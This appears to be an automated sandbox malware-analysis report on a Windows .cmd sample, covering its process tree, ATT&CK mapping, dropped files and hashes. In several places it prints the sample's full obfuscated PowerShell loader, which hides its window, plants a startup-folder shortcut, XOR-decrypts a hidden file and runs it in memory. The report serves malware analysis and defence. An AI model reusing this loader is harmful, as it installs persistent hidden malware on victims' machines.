15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter11Startup Items1Startup Items1Masquerading1OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsPowerShell2Registry Run Keys / Startup Folder12Process Injection11Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder12Process Injection11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 326339 Sample: iqfpdjey.cmd Startdate: 03/12/2020 Architecture: WINDOWS Score: 52 18 Suspicious powershell command line found 2->18 20 Suspicious command line found 2->20 7 cmd.exe 1 2->7         started        process3 signatures4 22 Suspicious command line found 7->22 10 cmd.exe 1 7->10         started        13 conhost.exe 7->13         started        process5 signatures6 24 Suspicious powershell command line found 10->24 15 powershell.exe 19 10->15         started        process7 signatures8 26 Powershell creates an autostart link 15->26

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
iqfpdjey.cmd3%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.v0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.229490765.0000029B675FB000.00000004.00000001.sdmptrue
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.229189779.0000029B673F1000.00000004.00000001.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.229490765.0000029B675FB000.00000004.00000001.sdmpfalse
        		high
        http://crl.vpowershell.exe, 00000003.00000002.228175750.0000029B65424000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.229490765.0000029B675FB000.00000004.00000001.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000003.00000002.238142457.0000029B77451000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown

            Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:326339
            Start date:03.12.2020
            Start time:10:07:58
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 4m 48s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:iqfpdjey.cmd
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:24
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal52.winCMD@6/5@0/0
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 73%
            • Number of executed functions: 16
            • Number of non-executed functions: 1
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .cmd
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
            • Execution Graph export aborted for target powershell.exe, PID 5852 because it is empty

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:08:51API Interceptor44x Sleep call for process: powershell.exe modified
            10:08:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\add375f568547c9bc8c38d92878f1.lnk

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.9260988789684415
            Encrypted:false
            SSDEEP:3:Nlllulb/lj:NllUb/l
            MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
            SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
            SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
            SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
            Malicious:false
            Reputation:high, very likely benign file
            Preview: @...e................................................@..........
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qr4vknk.ur2.psm1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview: 1
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zi4nuspm.wae.ps1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview: 1
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\add375f568547c9bc8c38d92878f1.lnk
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
            Category:dropped
            Size (bytes):1088
            Entropy (8bit):3.0421133785579646
            Encrypted:false
            SSDEEP:12:8glRsXt8/gA8/tA/TwLHsISzKQcXbEl9gEwNCeH4t2Y+xIBjK:8z98eWLALSzKxChwv7aB
            MD5:FBA2ABAB83E60E13CA1C6C01A6F942EF
            SHA1:0F0F94441394FE18450BA1217188EF58F429E332
            SHA-256:E1414FADF253B69C766A99F86F3D0224871722CA33732C2FFA1A506F4FBF36F2
            SHA-512:3FB7502EC2A2CC65500FCF11AB56D62927D8F67749E7C1C03FDAF48A4CD86A8BD2D4E238429A94C20C346B7976BC491A924F8B8C48428EF6CA65013C854064B3
            Malicious:false
            Reputation:low
            Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........users.<............................................u.s.e.r.s.....V.1...........u055610.@............................................u.0.5.5.6.1.0.....V.1...........appdata.@............................................a.p.p.d.a.t.a.....V.1...........roaming.@............................................r.o.a.m.i.n.g.....\.1...........microsoft.D............................................m.i.c.r.o.s.o.f.t.....N.1...........phlk..:............................................p.h.l.k.....f.2...........iqfpdjey.cmd..J............................................i.q.f.p.d.j.e.y...c.m.d.......K.....\.....\.....\.....\.....\.....\.....\.....\.u.0.5.5.6.1.0.\.a.p.p.d.a.t.a.\.r.o.a.m.i.n.g.\.m.i.c.r.o.s.o.f.t.\.p.h.l.k.\.i.q.f.p.d.j.e.y...c.m.d.............}...........r.b...K..i}.r..}...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.
            C:\Users\user\Documents\20201203\PowerShell_transcript.414408.4OQwtEdb.20201203100851.txt
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
            Category:dropped
            Size (bytes):16593
            Entropy (8bit):5.793709364320958
            Encrypted:false
            SSDEEP:192:aBVgUbBVguBVghGqxrxjpBVgXeQePePeGBVgHmJzJzJ8:SVhV7VQf5RVz3GGWVV55y
            MD5:DF069F98BD3E9A4A625D651453CD5238
            SHA1:868EF2827C9600FE8AB8FAB7EEC9013EC7903E85
            SHA-256:BDE876AA7806CF40C8DBC88201C524470CBF372F63BC777D227D31C067104319
            SHA-512:887EAF387144715A1E667496B1A34EB13B2F596E9CB2AF73A223148854E55C53C427509E7A629FC621E8EED2A06C1F539F3D66A6D47380997E7D3720B9346144
            Malicious:false
            Reputation:low
            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201203100851..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w hidden -command $abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vR

            Static File Info

            General

            File type:ASCII text, with very long lines, with CRLF line terminators
            Entropy (8bit):5.621690587448391
            TrID:
              File name:iqfpdjey.cmd
              File size:1933
              MD5:ebc549adacb4bd69742227f9b4d06b30
              SHA1:17a8eaca90e42e5c6b494e6586a8d1e66d8e9dc3
              SHA256:97375803f9b120384077a144306e792d7f5a71e358f34161b2cf9a42d10d009e
              SHA512:012e3b41364f0865041f0a441c638c9f58ce93ca9501872ad15594050f4a89f25f78b59b9824b38b1c7a3c4eda9460554d7c27a2931e5b403b8210839c313217
              SSDEEP:48:6tRJ76p+ESakhSISpviSI7Bp9OhKgwxln5ZwUNDle/I:6JkSNhSISpaSI7vWKgwHjwS
              File Content Preview:@cmd /c powershell -w hidden -command "$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-obj

              File Icon

              Icon Hash:988686829e9ae600

              Network Behavior

              No network behavior found

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: cmd.exe PID: 6028 Parent PID: 5668

              General

              Start time:10:08:49
              Start date:03/12/2020
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\iqfpdjey.cmd' '
              Imagebase:0x7ff77d8b0000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 5076 Parent PID: 6028

              General

              Start time:10:08:49
              Start date:03/12/2020
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6b2800000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: cmd.exe PID: 68 Parent PID: 6028

              General

              Start time:10:08:49
              Start date:03/12/2020
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 